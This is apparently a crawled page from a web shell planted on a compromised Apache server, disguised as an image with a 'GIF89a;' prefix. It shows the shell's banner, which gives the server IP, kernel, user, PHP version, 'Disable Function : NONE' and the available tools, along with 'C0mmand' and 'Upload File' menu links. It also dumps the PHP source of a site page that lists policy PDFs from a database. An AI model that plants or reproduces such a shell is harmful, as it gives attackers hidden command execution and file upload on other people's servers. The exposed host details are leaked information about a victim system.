GIF89a;
Server IP : 172.26.0.195 / Your IP : 18.119.107.159 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/pdf/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Header Start --> <?php include("headernew.php"); ?> <!-- Header End --> <!-- Inner Banner Wrapper Start --> <div class="inner-banner"> <div class="container"> <div class="col-sm-12"> <h2>Procedures and Policies</h2> </div> <div class="col-sm-12 inner-breadcrumb"> <ul> <li><a href="index.html">Home</a></li> <li>Procedures and Policies</li> </ul> </div> </div> </div> <!-- Inner Banner Wrapper End --> <section class="inner-wrapper"> <div class="container"> <div class="row offset"> <h2>Procedures and Policies</h2> <div class="inner-wrapper-main offset-top-30"> <div class="col-sm-12 col-sm-offset col-xs-offset table-responsive"> <table class="table-custom striped table-color"> <tbody> <tr> <th>S.No.</th> <th>File</th> <th>Session</th> </tr> <?php $a=1; include("admin/connection.php"); $sql= "select * from ssr where type='pp'"; $Session=""; $pdf=""; $query=mysqli_query($dbCon,$sql); //$result=mysqli_num_rows($query); //echo $result; //if($result>0) { while($row=mysqli_fetch_array($query,MYSQLI_BOTH)) { $ssrid=$a; $pdf=$row['ssr_file']; $session=$row['session']; $a++; ?> <tr> <td><?php echo $ssrid ?></td> <td><a href="admin/<?php echo $pdf; ?>" target="_blank">Click here to view</a></td> <td><?php echo $session; ?></td> </tr> <?php } } ?> </tbody> </table> </div> </div> </div> </div> </section> <!-- Footer Links Start--> <?php include 'footernew.php';?>